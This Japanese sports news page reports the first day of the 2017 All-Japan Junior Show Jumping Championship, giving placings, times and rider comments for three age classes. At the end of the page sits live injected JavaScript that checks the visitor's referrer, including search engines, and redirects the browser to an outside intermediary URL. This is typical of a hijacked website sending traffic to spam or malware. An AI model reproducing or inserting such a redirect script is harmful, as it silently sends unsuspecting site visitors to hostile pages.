News
2017 年 8 月 11 日
《全日本ジュニア障害》第1日速報
《第41回全日本ジュニア障害馬術大会2017》が開幕しました。今日(8月11日)は各クラスのスピード&ハンディネス競技を実施しました。

 ヤングライダー障害飛越競技には37人馬が出場しています。昨年の優勝選手、小牧加矢太(北総RC)がガルーファンデスケンメルスベルグとのコンビで63.69秒で1位、2位は鯨岡啓輔&チャーリーブラウンI(東関東ホースアンドハウンド)65.12秒、3位は仁田原知毅&アザモア(福井工業大学)66.10秒でした。



▲小牧加矢太
「今日は無理をせずに行きました。この馬で水濠を飛んだのは昨日のフレンドシップが初めてだったので、どんな感じなのか心配していましたが、今日はすごくきれいに飛んでくれたので、自信になりました。明日、明後日に向けては、普段通りのリズムでいけばいいタイムで走行できると思うので、人間が落ち着いて乗っていきたいです」

 ジュニアライダー障害飛越競技には61人馬が出場しています。1位は木村友哉&C'sセシル(RCクレインOP)60.39秒、2位は上村司&ディ・ヴェルディ(上村乗馬苑)60.94秒、3位は杉本瑞生&サンドウィッチ・コア(Stable FEDERA)62.95秒でした。



▲木村友哉
「自分に緊張があって、前半は思うような走行ができませんでした。馬は良かったので、明日もこの調子でいって、最終日には決勝のジャンプオフに残って優勝したいです」

 チルドレンライダー障害飛越競技には、本大会最多の88人馬が出場しています。その中で原田昂治(蒜山ホースパーク)がニューニューハーベンで1位(58.24秒)、キックインザクラウドで2位(60.22秒)と上位を独占しました。3位は62.37秒の筒井龍伸&ハンティングデビル(RCクレインOP)でした。



▲原田昂治
「1位、2位になったので自信がつきました。ニューニューハーベンでは完璧な走行ができたと思います。明日は無理をしないで抑えていって、決勝につなげたいと思います」

 明日は全クラスの標準障害飛越競技を実施します。

本日の全結果はこちらから
aaaa



  • 2017.08.07
  • 2017.08.17
  • 2017.07.17
  • 2017.08.09
  • 2017.08.04
  • 2017.07.07
  • 2017.04.20
  • 2017.07.25
  • 2017.04.19
  • 2017.06.06
  • 2017.08.07
  • 2016.05.06
  • 2017.07.21


var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/lvinter2/intermediary.html?outlet80com"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl;